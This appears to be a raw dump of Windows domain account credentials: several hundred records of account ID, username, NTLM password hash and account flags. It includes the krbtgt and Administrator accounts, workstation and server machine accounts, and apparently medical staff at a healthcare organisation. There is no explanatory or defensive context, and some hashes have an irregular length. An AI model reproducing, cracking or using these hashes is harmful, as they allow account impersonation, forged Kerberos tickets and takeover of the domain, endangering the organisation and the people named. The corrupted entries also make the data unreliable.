1661 reinasor ccf69751cc4a4f8e318b0df52947ccc4 512 3656 mbravo a9bcd52c5198a83a66fe224315fc73f 544 3163 aabliese c4fd4d6e475ab961362ce4ee231aca2b 66080 3109 kjstenger 8ec37706d3de0518b3220192dfc58061 66080 1805 jegervpt 701a630ff55b9ca5c8639cfa39020564 512 1324 lindasander e2a2964ed651c0f7ba4ec81dd01e02aa 66048 3650 khowell cf561634a85d8f5597446005fe7fd8d1 66080 1158 m_rittcc 18bf1995a1d949b7ef9741892266efc5 66048 1118 WSERV0$ 9da2e9383bf4520440d92ac54ac8a4d58 4096 1745 lljennbi f6d4b79198861b1be247d463634341c6 512 2042 pjzimmerman 84ce0bce7008f217cd687f3e5126eeeeee 66080 3614 badahlen 75222701b0d398c68117ca403f205478 66080 1174 aanelssu 
bad82b030b9c4842f80656a128a76b67 512 1758 hmneulsu 78e277034ec4906d2525b079d4c5749e 512 3174 danderso d4e7dcc95e80467c613daa02cd83b446 66080 3664 ewestergard ba4aa5e94885b31904af6af6c1bf4f39b11 544 3173 csylvester 55b7d520ed567ed59988a54f20078de6 66080 1943 lmweiss 706ee8e0530f19256d86b5457ffa93d9 512 3172 nlstrand c4300f168b4a6ba2c638ce330c4b4a0d 66080 1282 jillgeary 2f913a2a114e727390a6aedc67024b8b 512 502 krbtgt 0743a7d1387b8223ea5683c913ff9e33 514 3661 bgesell d18a344ee8d2bd0a7cf2c10b17a1ee02 66080 1889 hmasmus 62dbe4c921ea6d6f5f412b982405a944 66082 1317 kverjlsn ab6bf500d58072acd7d09530dce4f6b 512 1922 degrunewald 5d773ea1aa7e3d4e47fc15750e8084ad 66080 3658 rloepp c88b55448a90898be0d8eaca3e7c9961 544 3666 ceaves 3ea18c0fbd5c65cdc2b3cb180f99aa0d 66080 3177 jlwilcox 633d364df0e81ee7ce9de549fc9b0088 66080 3628 MRNWKS14$ 3e00e4aae6f1cf0133f66a3b70959413 4096 3178 dmbartels 3cd77333d81bd637234a19ac76ad399b 66080 3181 nraman 366b8b4a49c10e7441fc1b241868a2f2 66080 3635 bdelage 2699a0a42951c71f032da1b9e2bfbf05 544 500 Administrator a80fdb8db842a99d87ef3d857f8ddcf1 66048 1523 tbmatheson 1f776ee6e96b208f8925b03cf11994e8 66080 3660 cfricano 6bbcb20afde0d6b67e6761bb9a7e280 66080 1926 drbarker f990ee0e10ca11e126d7e7001181c0dd 66048 1477 levranz 08a4a2727a1ca671c9260c85d6debc46 66050 3674 jhansen da59c62be282a2b3a207d663eaba129d 544 3676 bsundar df4e2753ded8ea9d3982d6b386196c95 66080 3186 slmcdonough 19019865c9627db050d3debc6d068d59 66080 3187 sbkriegler 51a6eff0344e71a73ba0465acba0dc02 66080 1219 drmagnuson 2b89a35ea806d441361b86e8928f0069 66050 1884 drdellison 7b3ed86168a343943a860db9fd43326 514 1617 radmgr c6ff3f57b90e71395cc63de7b5b80086 514 3104 kkkemper bfe2bdf62b5d348db2317060791183ad 66082 1625 dennjxr f5c1703c283b2e86061e499e9add725c 514 1867 kbitzan c9ea8a405ddbf37e55ef0fa1fc5e7062 514 1635 kjjohnxr 50a17b4631d880ab69c0bff939184e1e 514 1643 llsander 71b43a8306d1bb60e84a0bc2400a5a21 514 1396 amvoorhees 71b43a8306d1bb60e84a0bc2400a5a21 514 1447 llmarfell 
382caba988ddcb6b0e7d433b44168b60 514 3110 abthompson 752c4e688d32292b2369a20766f97fe9 66082 2049 tjpeters 661245aab3a2da1cffb9296f4c1bb2d1 66082 1648 thomrmxr 22daffebc9951232db7c2255367541f4 514 1243 bmc 51e4a88e2b207731dfde221c1aac6433 66050 1232 drvan 6198afcefcf76d5aa8ed5a0231f7c4c6 66050 1235 krw f53551d10c915a704f27bd094983b4a1 514 1399 rapearce f5fca4da57abb3624aec5ca9711fad2e 514 1869 drpinke 928084d464e8e2b46953a287d34603ce 514 1901 vkapoor f08ad0acd589ac2d8077cc6be3823b55 66082 3655 drtillotson a14701c2fc0c888805c49abedeab76c7 546 1259 cardiology 0909df2be620d82633dbe6df2a14e822 514 1484 drriley efd9ec287d222a56e5c58fbb5e0c00b3 66082 1511 jkkaspari b68960c19bebf90e2519ff493224cb5d 514 1510 dmspierer 4a842475a181664261effe96a0294ffb 66082 3683 lrhtest c0c14d4369392a6c8984e135341a3e35 66048 1340 akdrouillard b999e773055362a90e066168697f34b1 512 3157 emrabie 84ffe7a05489be6b159d1be4f28d8654 66080 3188 testrad01 7a21990fcd3d759941e45c490f143d5f 66080 3136 arwilliams 1c8a15dc2cf39ad724ecffa34c51df22 66080 3189 kccoleman c53f411c5c25205eb6e41cf532f15f3 66080 3192 kmmuckenhirn 08e79d731566b3e02ee6567b67e06bc2 66080 3193 tlheckman b4fef99bb054df27f3155fb289ddbb09 66080 3185 lglidden 1c74a011d13341346553b4cab99c5f4f 66080 3688 tcarpenter 6dfbc391f973e9edae3d284e217ca305 66080 1162 jdfransen ac3b03f29ce9321c5dc6505ecb69de3c 66048 2085 mdborowski 9d5c0d7a29ba9ab4e8f5ea70731742 66080 3690 jtreynolds 740500dd0c0a4113cb30053c083016d0 66080 1322 jmbernsn 82f1948a684b1ca3acf28319c5a8d011 512 3679 kglasgow 990c521adaaa5e4addf2c9a76018315c 544 3691 mhudalla 753e11fb4f4c64d36d3ec29df1c14b33 544 1829 alerickson 6bd1928a5bff3e98e4e5883d182ecfa4 512 3198 sbeving 395aad84da74aa6f8e56c3461b797315 66080 3200 kpeterson b4d06b8670a68c90ad1b704bbd3fa4a6 66080 3203 naolson e9beec3ca6b473c4e656c1ef9c62a18c 66080 3204 jschmidgall 2e00b6ec17a25e579e9d78463d556549 66080 3206 mdanelke 58d267031108d7b9089fb94f236785c8 66080 3207 cblascyk 9c3b90b15f00f481b94aa164729a4d9b 66080 3208 
tbengtson 5b91192b86e5e38304e03cc463c2688c 66080 3209 bkipp 2f2b9a59122f528ae9dab4919eef021a 66080 3210 jstock 04a4816d0d9c50ed5d81967e4472b2 66080 2069 ssnordby b87873f5c36e099a1dd70c2997ee7634 66082 3699 nchelliah 99d18a5640490c029a99461967318196 66080 3700 aathey 802b86f643c99aef0d2ffb945005e482 66080 3121 blee e5291f1449f66686a1def83daa759f66 66082 3706 belee 80b039cd64077f54d6a6c87b76e5cf5f 66080 3708 phaberer f9c143be0041861bb993f39f78df0952 66080 3709 jeandrews 47b29e7297e1a2c493882cb5d1acb5a6 66080 3717 cwarde b97536d0b9013d6c80f2e51d85a6a6ab1 66080 3718 mwendt 0c9dc5585aea4f3f673fad73bc01b5c2 66080 3726 sdenardo 7f77eaa05b49ccc5de2152719fa83158 66080 3728 amiller 7af9829b5e7a480432bbff19ba1a8293 66080 3707 tclemensen eebccdc0b2cb0f4f4e7312f577e3e823 66080 3746 khyttsten 7a21990fcd3d759941e45c490f143d5f 544 3749 jlolsen 7a21990fcd3d759941e45c490f143d5f 544 3714 bmoerke 274194e661d6b4a1f3f4b4395f2a8e11 66080 3705 jhotvedt bddfb254e68978d750fb3b11c88980c8 66080 3747 tschmidt 32ed87bdb5fdc5e9cba88547376818d4 544 3745 lguttormson cf773e1bcad4cfdcabbcc2a1773e8dfa 544 1569 lmshol abc4e928d4b6656cdc2f50d7db91658d 66080 1961 menosal 7bed3d262008d701ebdf6f192f4ecb85 512 3211 jzimmerman ab0361df3905918f506e1ef81a676068 66080 3732 enelson fdcb937082862fec68eb27cca0230cae 66080 3743 kquarzenski 368d1f874ec963f51c3f37bd7cb27728 66080 3217 jradermacher 8e25fca7fe670a1ef3f7d33565702c18 66080 3216 jspaeth 30b6725b7f206dfef38afd3b26cde482 66080 3737 rsticha e2d1252eb58c355cb52d4b94a5716122 66080 3731 dweigel 9df1fc4471da9920da645c1e1b0193a3 66080 3742 amanderson 6838329ad037fab10150f471aafa16bb 66080 3729 jbrand bbec3aa8fccb44beb9658bebd230812a 66080 3738 jandrews 7713e54d6149c19e6bf0b863d7a5829a 66080 3736 abalgaard e02141e877cdc6f0a76212d68b7d1185 66080 3741 lbeebout 751d0a42c7bc3e9728c27852fb7574b7 66080 3730 pdale 082c854cedf9d48adefdc6ad9e5e30dd 66080 3733 tdudley 73c7d1001e98494ff50090e420968de9 66080 3734 sfeierabend 0c20349b27b0d1e70091e812ea5d3e78 66080 3740 tkay 
aa0cbfff234b8868e3d0e8ecaed1fb49 66080 3215 mkunstle 869344f72de1ad848b5981dcb99d19cd 66080 3739 tlindley c13ecf11cdc215c8060aee2dc9daa7b3 66080 2039 mtorres 789c1048398e3c875f62415cbedafc63 544 3194 tstrates 01f6a51f5ea0f3fa147081938fe17abb 66080 3724 jlohse f4f6de46d8493fe763742c4ddcada732 66080 1839 bjonken 1455893cf488171aac6bdf8f38806f02 66048 3662 bbagheri 85d1b9ed688976d60bca02746a0ea24d 66082 3716 hdavids 2f192067980a1fa183a4edbcf7f88109 66080 3720 aseger 050324abfdd09e698f545ef1d7669076 66080 3751 pjdilly 1a8d34d359c633b9d2b54b20c908dcad 66080 1810 marqmlpt 82532f6826ab4683746e6c899f1d2c26 512 1957 cldahle 1b269f78c8f3b1b38ed363de625b4be9 512 3686 aredding 8d7f15bf43c1aeb699020e2ab4f943a8 544 1928 nlbertram 4802cdb907b9b5e97a4dbb4892b80c7b 66080 3748 bmoore 03096f8607f2f99d8e56d9b63965a2cd 544 3750 jmorris 9abbe5859bdea767528b3ee5e2ba3990 544 3704 cbenson 7561c8f4f9d6f6d9a68a1df57f12606c 66080 1167 r_vigecc 836198353f3bd28c37c6b3656af4d287 512 1519 kjandrews 72689568cd6b52990919f71401f9fbfb 512 3703 lhansen f9e37e83b83c47a93c2f09f66408631b 544 1161 a_evavcc 3227e9a3a0e50f03d995e50dbedc77e9 512 3685 bdehaven c242092bfeeb43b08e7225036b9f6795 544 3182 rschulz 017bc067b2691fa3c1186f14f5c544ba 544 3218 nverma 24f6e3c0b4d60f1fb157fbb057ff6478 66080 2045 smsampson 56d5c133f3ba2b2c8b59b87bce21d4ef0 66080 1827 kugllmbi 46eb00e79da62c3d913ac8cabd39633f 512 1755 pahlmebi 59f20522158f90a6507a5a68450bf8d8 512 3682 drbratlien 6af0a5199725de2dda9244426eb13dfd 66080 1811 symenapt 7c2775f5f46ca6772ff6feda5a15c39d 512 3191 jbheckman 34e66be24b6b3e3018ba4e8590e8ed76 66080 1286 karaaxell 0a3c4deb4606ffc73b0f3db36e73d007 512 3678 asoutor 84b5ce26e9c3c758b60b796381e11a0a 544 3673 cclark 45fd4325cf7526f08270d6d95ec745e3 544 3744 kimjohnson 7a21990fcd3d759941e45c490f143d5f 544 3219 kijohnson 4aea5ff9f308db07dbb3e10c8f59c1e3 544 2099 drjelinek 2881d5cf74fc982d10174434c69d37ca 66080 3221 msumner 0a36ea273622bb254eab03ad1d2f0675 66080 3225 mbussa 834a01e171c1511ad46f193792ac5d62 544 
2016 llhexum e6de2a3a895e2f8442d9ef41dc06ba43 512 3212 crohloff ea0069dfe9ce92a05b99a3f64914dadc 66080 3702 ajensen 65071e8a9f6cd3d347566a45f246cdb1 66080 3224 kbuczak 58a478135a93ac3bf058a5ea0e8fdb71 544 3687 tnapp 7ded9cf2a15278db249f4dd0c5c5b2cd 66080 2082 dsquires d8d5d149c6286cedaec6e1cb293d375c 66080 1997 kgogbogu aa78fcafaaecbcdb90b208ac4b5faf94 544 3645 bjlaney 84801213b740b81e9ca60a646b1e0a3f 546 1215 dll 013140f7ceff192b451eaed83b7dbfe1 512 2010 rksundby 2f1bc14d3d54d550a2160ea8fc7f363f 66080 1880 ajfalck b309082b1f3269e0cdf56b71b97e6bd5 66080 1315 lolljdsn f9371be7906002d68a9e1c3da64f4ed2 512 1966 elpeterson c6b2f58f726188912e7e4cc95a787a0f 66080 2064 tleliason af61440f9a461322e1c2fc7b5e0c28de 544 3145 ahdominguez 8b14ef8a873276d96a2ac0567d2d6750 66080 3680 hnalbert c27545b18e0f7af45fea11a7d272b472 66080 3135 etberro 4a829a41aab63d94d2f7dd252eafdc90 66080 3147 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080 3197 jhaley 6cff63abc2d1668b91019e120d418b87 66080 3764 cdnorris 5600599991d0b24ec550ca51e9ea53a5 66080 1964 djorandi 1df0d388ff98dab288ac33cfc9af3f17 66080 3170 kmsawyer 3b8a64c7b0261cd3d4273a71a04b8a3d 66080 3701 jbrevig 0d867ce7ee97500f4a18088077719be9 544 3770 jgmarshall c71cf281c08ba3a2580bf7892ed8a8fd 66080 3232 mlpaulson c26abdba943fc666da80387bbe304f6d 544 1886 drberger 98447d252cce6109736c24cb8c5b2c04 512 2078 hegewaldl 7a21990fcd3d759941e45c490f143d5f 546 3659 tharrison 988a8fe2ccb22a1484a20b1f962a2486 544 1668 adkamrfp f72e3a858debde72f50f85bee53c1a0a 512 3758 dnriley 3c42e6b35fd0a27bbda711eba4bd5fd7 66080 3684 kkaushik 04592e27471e3e1ff0fa3f383da6dcf4 66080 1217 drlipson 71b43a8306d1bb60e84a0bc2400a5a21 514 3235 lnygard 7a21990fcd3d759941e45c490f143d5f 544 1875 jlthunselle e4c329e69525291304a7d2807c89477b 66080 3233 acfiala ea65fb049f698ca1a2a5d94fd13cfb0b 544 1565 lwwaite bd5c7f1e2e11b4c5993670cde347bf4b 512 1641 pslinder 9348c3642f47ada17dcfdc1d7d8eca88 512 3762 hwilson c923157653b773887144e4cb634e53bd 544 3205 cshipley 
1d82cf8e1ad54e24787e12d42b23e4e6 66080 3236 crico c0aa220653ba235f1f0885bf5aeb6fd6 544 3776 LRH000955$ 2aa647c303f84b9487ca74d2aa4d1f83 4096 3761 svanerp d743f0e50d195a3b7f57445da256d44d 544 3237 jbauer eab4556003a83e179a149ce6583e097f 544 1445 saolson a3174064e5df297ceaebaf4682a611ef 512 2089 aesax de353cfaeec8601f83b2d658a0ac8561 66080 3780 Tanderson 1b66337b958db181272b0c28092321c5 544 3234 jlkraft 2590913f809b8930b7b7338e56228785 544 3617 sbhaugen 746a427b1b8edbfc6a0320258835cf37 66080 1626 m_dewexr af2d43ceaea484e7871bcb902756b2f9 514 1621 jebeithon 1b1135cb9431cff7b48447d86d0f39ad 66048 3240 jloh 0f564bb6b25912dc51eeb64a9bf30389 66080 3239 mleon b2dc81d287286332b163deb7d993be68 544 1571 Lkgrunew 3b4e6bbb125bb148ad8b0ede912eacf6 66080 1325 cbstigen 5654690ff05f50725ceec956aff0368b 512 3230 kdresow 0e342dc5277c074d71a64e61ae82819a 544 1946 tmdewey 9806ad49e12ad478ac5c3c47b4775a7bad9 66080 3231 mlromslo 9af11b0af4f5c499b1585f7006d3f0af 544 3241 efevavold c721e2a5c9fad69f68d1d9f7233d0a09 66080 3242 dmgrothe 68d158ffe0ae5e8c03893cdcfcdc9183 66080 1707 brunsmfp 2f891514a09b310c5e184bdf123dd635 512 3754 jgmitchell 8cd2209358a8e86b0c7b65e9863f7f38 544 3244 aarosenkrans e89898c83b3b04cc87cf2ba0f1befce9 66080 3245 tthagen 8a3fae86b263434cd7d27c58418823db 66080 3246 lljensen 24cc4a64ec9ea3b23166d44427b96c79 66080 3785 pmhabberstad 7a21990fcd3d759941e45c490f143d5f 544 1759 llpearso d6dc83575443fa81b7b8a484539eb29a 512 1893 mmbarnes cbd188dd7ea8598cefd6533896e6fbd7 512 1202 jea e86e945713819cac1d04720f51e1f7e4 512 1536 djlandmu e181f457342748c4cd09dad958e72b0e 512 3760 pmiller 50ae45132343dd3950795d4ba213912b 544 1710 bmpetemu 4a5d2e77270842ba4d43ab14bbc92ba3 514 3238 bemery b5f84ffe29fdd2ccd34a98a2af1041a5 544 3162 MRNWKS17$ 52f187408f397f3a73b6d514a1101fd0 4096 3777 mstayman 95087e883541e580da2d78a0340288c2 66080 1441 jeprice 0b8557714db41320768a6c8ff3ad8d0b 512 1934 ewolden 1b123eda9c30734c5349be5ab95e622b 512 1624 ldcharxr 10d51136ecae056bd31609d64c39cd91 512 3775 
tsofficer db3dcdee7088c54347ecb9d337c6e6c7 544 1297 maryjotonneson 651de33d6cdf9231b43056ff7071601f 512 1180 ajfishsu 4e173f53ea685937facdaccc764bb322 512 3616 sibowman 883657c785794a6c66245708bc0a146c 66080 3782 Kmfinkelson f03cccbdab1380b0c3deebb5a2476f12 66080 3766 lnelson 9fa0ebbf5f3d64d488ee1462baa23e18 66080 3663 ljdingwall a44fbb7283ca381cbacd6d8fefd79424 66080 3176 prhtech db2e2e2db5de660a4e66952e7c340dea3b 66080 3252 ebecker a6564f0d4c7b3e8ec13889ede1d1b4fc 544 3253 sknaus 287d4519e3da6469a4f572378050f56e 544 3254 hwold adc85782b0a540f111f66b48fafaaecd 544 3697 lrapp 5aa11bbfbf48dabaac1b3f618a03af82 66080 3711 wlnyman d0e5676e1f18e67d6e9392ac5887ec2c 544 3778 rcampbell 0188aabf6df8847800e1755889a8fa0e 66080 2075 lkbarthel c9719528f8f9ebd659840786bfcec068 66080 1402 lrwhite 5e5fab4d07e0c0d0df0f6a42dba9fc27 512 2072 mspeterson dc87be1856ba6fd7ed533e27f2a40545 544 1650 welccrxr 78215d449c6f17482b541ea20cba4a93 512 3675 MRNWKS18$ 71a27e0b7f8fab8e51be242bbd34f5f0 4098 3789 grhtech c86c5af58d28542d1947fbcb901a8299 66080 1866 lastoll ef42a7d6774983241a2a55247b96b72 514 2604 kjkemmer 606aa7efd3d9d3c96af8b9219e595cd 66082 3175 lfabel 90153dd7c07d2e412e2670e22b958ee4 66082 1681 kanoyecc 60e698666b0a2b6941a72ac4aff6a4d9 512 3721 khokanson c0aa6268feedbfcc8b2ffef3f072dab 66080 1647 lkthomxr 7bac175452ce652677262dc8009e89d8 66050 3268 tlis 0c5e5cca01119988aded6eeb6d1e5867 66080 1206 drborowski bcae9cf983d6e62c61c18f6dee82a607 512 1905 ajmelberg 27faf911827510ef3f2017aa39f948e6 66048 3765 dpickrell 8fbb36341e774e2e491adbb461695f97 544 3278 dlesmeister 7a21990fcd3d759941e45c490f143d5f 544 2093 mnkowalski 572356a7e037ebd894226cc60900eeb9 66080 1188 pmrundsu 8e6771b224e703dbbd186bcc343c0239 66048 1703 lebuchmu acd35ec2b7ec25a37c8b935a3565b1e5 512 3634 bdlarson a573af9f9250995ceb4d2342e40bd895 66080 3112 MRNWKS13$ 53ba223a954a866b916b68a12738c12b 4096 1240 drmatter 966440c2b1a673166d488f3891a80efe 512 3698 jhoffman b4855825ae580cbd2015e734299642e2 544 3280 TEMP0$ 
8252bbf03e3db69e1d872e2c1eb5ec17 4098 3710 bmbeckert a498616fd144dd0681a224d4690eee7c 66080 3122 hmshol 476d0ab3ac09690e864c11e05d371276 544 1165 t_martcc a44772032da791fadc285212cf1912c3 512 3273 spatel 072173c87f28720a583f890ae7559946 544 3274 jcorry 150873b40164b420d7117fe7d4309e62 544 3276 kesse 9b69e8d44bb99f05ffc210987b6edab3 544 3277 dgiannakidis 4468caf7a3f7440bc99a04bd34744e7b 544 1833 jehaarstad 4cbbc36ab7ee30cab782e16ea4270e45 66048 3784 cdcooper 48b214605ef262be9290e474f5271cc4 66080 2038 mccooper 982fccae904b0cf57fcabec3e9cdd0d1 66080 1929 baduenow 655e06636ca0e2682294c6b86d2d41f0 512 1654 n_aslaor d35cab41444ebfa7a8246385a09c82a8 512 1659 blmulvor 17b856dfc50b19e414968a6a2772e34e 512 1573 MRNWKS12$ ae39f114a0924f2b703e5628b5a1f226 4098 3266 lddivald 3de8505c35442ae80184a6c784a4e0cd 544 3787 bsmith 4472910b89492aef53ceb6b420b15f52 544 1835 b_glassu 67f5296cfe35af81a281822f5789cff2 512 3693 mwood 05355201b0e8036a0f80e48d4d4a454c 544 1321 anesmgr 606824736dd2645664eaf79fc31d1956 514 3796 bdfagerlie 6650c25cf1a1a7345926de9fceebdb58 66080 3797 kanikcevich e3a2323f39581fc51aee293e5e50c944 66080 3606 clboyer f92df27b803395ca73751f297872fae9 66080 1748 laandebi cc4e0355850bd035fa09905f53f28aed 512 1428 mdflugstad 73f003f0d842f1f55437bdecc14a3baa 66048 3800 rmassaquoi 5c6cee0597fea0b5a32fe545ed9d8f18 544 1323 tracybeckman 998330048814c2a6e1b121ad0700c1a1 512 3772 pfshol 99e02a0cfe154a568c2f335a1cf41391 544 1450 katlynbockman 5cb6367e176a3a44fd38aac5e1a51d 512 1721 dlmortfp 7e32de26ea37ea0868cee8e8f2632a71 66048 1705 pabaglmu f2cce80cf6e95ddfb8da2fa7c3cfc823 512 1300 mllohse 64f2940a7f7e98b39f40b1c5c769525d 66048 3793 cthiele 9f12a60fe10fce15ceb8ca440e7bda32 66080 1744 j_haasbi 3ae668e7cce8b8e300fe2e8b81ed7393 512 3791 latkinson 7a21990fcd3d759941e45c490f143d5f 544 3801 holson 7a21990fcd3d759941e45c490f143d5f 546 1655 orasst e3853b1f7355a76024e5978553b7e0d8 512 3179 Dcarndt c68dd631d5061b45779948d721716c24 66080 1808 whithrpt c709283b34de77173d0fafef50155632 
512 3719 hdomek e0e50b795008b41856709a1d730aded3 66080 2052 tjkeller 775502b4d04a9f0d89d7d9fec9e67b33 66080 1223 mjn 1c0c10d5bc5ecd940fd491dcd67708 66048 3757 rrkester 33e61ce5f2e9cd59910e05b7c08be164 66080 1312 tmmark 01ee5ba08c4c30b61fba9d4cab74b38c 512 1618 mmalsgxr 32338b657b31149f135e177817d92d61 512 3798 tthacker da34b93958c0400f3f09d2ebc7f4cfcc 544 1697 mestuemu bbb4d417ad2061b15ba4b5f19a7bc840 512 1917 clcabrera 60a1eaac00fc84116560ede5db72c2a5 66080 1461 pjmarlot 8c8d459602830c8dc0a961b32a298a8a 66080 3803 haileyolson 51bda3bd385b2fe8e58927e2287f10 544 3629 abashir b5fa34e6c385bf96ca0028adf95128aa 66080 3795 mamunich 63919ea605bf5b36d96b7115af87a96d 66080 1448 drgupta cd16c8e938dd145c40ba9159c9cfb225 66048 3657 mmlee 2556b0a43ec0860d2547b285ac850d63 66080 3799 aemami f0b3802b0629cd85fd862caaeb9e119f 544 3190 klfuchs ad67ef3d1f01f2ce38cd606457e53dce 66080 3271 shanson c12db14a5dee7c993725969810cf5f48 544 3284 koltesa ed28d4db9d6d176ffcebd697d49c2538 544 3713 sanderson 2797fb2bef6849caad893f8ea30efcda 66080 1844 radefelice 06494501ef20b85f6517e1982511e4ac 66048 3722 notto 7fe981532394e2dc8c42c9cbc2a00568 544 3788 echexum 3fceb45f9810ef7ee61bb7aee4f87ff3 66080 1549 klbrummer ff6e02d7831f231a6c1c389d2b903fb1 66080 1807 almqklpt ed41f3390969fa51561c2e2679cdb065 66048 3727 sschmall ad23f058442413fa492a8b9c42722297 66080 1515 djpreston bd893dd5ccb9540c97f1b09f499bc524 512 1352 krheidpt 8d483b8055f2b79a9f83074e545c9321 66080 1754 alkuglmu 176b6ac8c9b3a80b10b9acb5f6420e6c 512 3285 lncunningham 1dea8a82847137ac244cad5157d9095e 66080 1619 kaarndxr 377871bc88640737991a91ee2fb63cb3 512 3792 rerickson b74f6805d5aec51aafccdb10e10d7dc0 66080 1434 sewilde 4164ae41a3d33fa45f88602f17b59e14 512 3283 lapointb 0cfa5bed8c8fbb3435bff603824ea9d 66080 1205 dtbjork 0c47178ff33cba3a38863ec09c60f00e 66048 3804 dlconzemius c2720f7eb4c0ae044b6f784882681d43 66080 3250 bmkraft a0e7c1995ea0d8de8b5936a8e2f4d9c4 544 1887 klkeller 80c8b29db94ed0b30dcd438dfae41a50 512 1466 dmanderson 
bcd95007ad292aa41e612fe16635cf7c 512 3620 tjmahoney 55c3fc77056307ad7c55f9001bb1be01 66080 1567 dsperr e2ce83b9895bab68023b3f8965d5e413 66080 3149 sacihak bb1ca804e39129284548b4144afa5efc 66080 1696 gelundmu 1f6a957330c98ec9247c1c73de1f1c39 512 3275 wgao 9fd1d13215e778089265d9c77811eaa0 544 2065 kkholland 62bcb945d2f22bd9296305df276fd120 66080 1923 taevavcr 1afbdc5b577af28262d9f9f97091edf5 66080 3774 aaengen 6a36260f41dbfdac767d0838f60ba28b 66080 1945 nolson 0f784ad40710074048e105d508d9c8d86 512 3763 bbartell 44837d1d8ddd2901d5ce7b01679406f2 544 3753 anhunstiger bd9834b1e396f7e5c0a3627abca2b79b 66080 3631 ajevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544 2018 aapeters 78311337e0e3c18802aa4b529a73a4f5 66080 3223 agupta 7b9d0d8a3e343866f174cf100d437339 66080 1796 carrie 7731dfbe3c47eac2765a137982b2338d 512 3779 Sstallman 41ab808371fd0290177402d4b7083414 544 1870 lmrud 4f4a3dbd0923b926a7c5385c68826c5 512 1507 lknutson d8a73e5661f56ccedfe2c291cbf79ab2 512 1658 smlapoor dd90179a47a25d3ff2397d5435c22a19 512 2087 tlbolluyt cff458f1414179962d61696e8ba2fdba 544 3773 ewoodke cd96953d72f3de97cf6fe6f54bb92f9547 544 1216 drlindholm c075a7246f4c8bef9d38a2d3a133bc2f 512 2040 llsiems 8cfde151045c5f9397ac0e226dae041a 544 3195 jsbigelow c8795e154577c9fc3d9474f979332c62 544 1628 rlgragxr f5c80f2d74103e9fa4f159a42c5606e1 512 1413 drtate 01ee5ba08c4c30b61fba9d4cab74b38c 512 3180 rrboesl d5b053724212803becc83dfebc87cca3 66080 1693 kmbugbee f941649e8f47b442b849646d0e9fbda0 66048 3689 adgenereux 80124839fe1e372436e4c7a003ff0841 66080 1552 almanning 890e84ad97cb8d2d1a2196feb89e1aa1 66080 2061 lstage 646a44785b574f9eeb2d6dd39fbc8713 544 1731 d_barkrc f45aac15e69acd4d8f909c616e5792d0 512 1690 ardeutschlander 06ab83fa6bef64787596b2e7dbff7e0e 66048 3255 amandak 8f2e0effefe9ce900f0af39654efb42f 544 3118 scpolzin 090a334bee52ef0af8d15eed4e67860f0 544 1777 smhanson 2f2cc839a042f276010567334733f55b 512 1227 drsamson a1079f9d031a997fd2ce2f5475701de6 512 1171 tjloxtmu 9e74d3d34d49e6255cdf47423971de78 
512 3143 mchristianson c549a587fc362d601d0a52492a4f9ad3 66080 1874 drglynn 606824736dd2645664eaf79fc31d1956 512 3243 wjstoll 463689d49c56b5cb9df07713ed9bf349 66080 3768 kmmartin 65a72bbe7eb27d0bdaddb1514bc17f27 66080 3621 jkpetrick 1fff5ccc480ed1c9af0d26f0370670f2 66080 2084 ambell c515d94ca7d4785b385f30b330f5ff26 66080 1299 missyhalvorson 4296577fbc12ebd93e998c7a636696a5 512 3681 cmschnurer adb4a2e8507a8c56d93600d145b6985a 544 1236 eaw 36f8dee2ff0c6e543fd59c047f67c8d2 512 1290 kimborgos 9b71edf13ad0572d0c45e39996c93691 512 3201 fbackman 244604ce957b7db25f7a26d29d782059 66080 3267 stbsmith 2f80cfd4647edf90c3b5c062e19cd953 544 1377 ctlarsen ca7e8ba4c5738e8919e047a67f91a688 512 1222 bem fbd5a20b0af06c7072f66d3e601f5df7 66048 1656 s_hoffor f6ac816feafe9a48d558c5c5c275163b 512 1817 klvillagomez cb07f6a4efd0161ec072c7043ec282af 66048 1620 gib 78cee4448b7f2c765c2e5773b04c9296 66048 3755 mbropes 7dc6c11be7bc7ffde538c61e937a3061 66080 3270 tjerickson c4c9bc11ccdc61ca0fa178335c89f11a 544 3756 ljhegewald 911b036eb67a3c3613aa586389b82df5 544 2043 orthompson 2f0b69177ccfca8ff22d99eb5ad33f7c 66080 1233 drvennerstrom 4fbed754b567cab978731a901070d06f 512 1250 drnoyes f45a632c42d72767bc0bd24cb3738619 512 3794 sjbroadway fec7f2e406f5fcdf259d41c68dd391ee 66080 3226 MRNWKS20$ 3c062810ba76be858c7168c102f017f4 4096 3644 NWKS15$ f4a49d5d5afe33be31b22bbf34c3ffcc16 4096 3279 keddy 4d633061f7446e627fab789452eb001a 66080 1508 amfries 46970abf77cbe0922b0fef23209f6c4b 512 3256 markg ab5058c6d7df4267b8810f2c687c94c5 544 3790 jrtotland 218143d40917d213ef5dd38998ee45e0 544 3123 ksmith f1c0c855344c74f985318e0593ceeafb 66080 1633 jajansxr e863cacd5e1c01a74b3b90fa62614df0 66048 3263 jessicao 062b97e0ef98fb82a9d8751fadf4040e 544 3282 talacey b81b54d6537f63abe40c0bbfe95d9a1a 66080 1520 kjnordick 7a32637f352e6251c468fbce69a16af3 66080 3171 kglanz c74f497e527592c592682cbf43c13907 544 1212 jhorak 6084ae91972fbeb924a2c906bf57c0ab 66048 1888 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 512 3805 tddonahue 
e4b4f74a11c7849a43c41a1aaaa6d769 544 1502 NSTORE1$ a7ecca7ada2e5e7460be17cd3be17451 4096 2028 MRNSERV0$ 3b7dca99302839049a812e34ee396e30 4128 2027 MRNSERV1$ b6db88adfb0d3292eb81c07aa0be29b 4128 3649 MRNWKS16$ 616d340582257213f48c5a31dc4bbf4f 4096 2032 MRNWKS3$ d84dad55fa5b4e00bd76a763eb794a62 4096 3222 caaase e18ca25635a48c99e81622bed575a0dd 544 3281 dlholzer 35235e5d7c7f4fc6b4b9b20bd644ba7a 544 3132 sjreese 6f712741e060f625db4c79632f6ab668 66080 3647 eeverett d382a68cd4cadfb315e090f0e25fe8 544 1638 klosprxr 4a4113c6269fb6affdc7721171691bfe 512 1527 NWKS16$ 9f05b3181145e48180859495e362189c 4096 3802 lkatkinson f5370a2cb0c74941246b8f314595851b 544 3696 sberg db273ce36efee2d860acdc2a6562a3c0 66080 2044 kjkhaghany 721e94d3c6fb6495f987ae4e9974ed16 66080 3144 clschmidt b99e2e175c81d852b1ee7630c3afe489 544 3665 MRNWKS15$ b72d2ca3ccf02632ebcecc7d0ece2f69 4096 3247 akwalvatne 652fab17e41dd3879b9b9fee393e4d3b 66080 1378 paragon bee6ea7d7368285956f0158844283bb5 66080 2002 scschmid 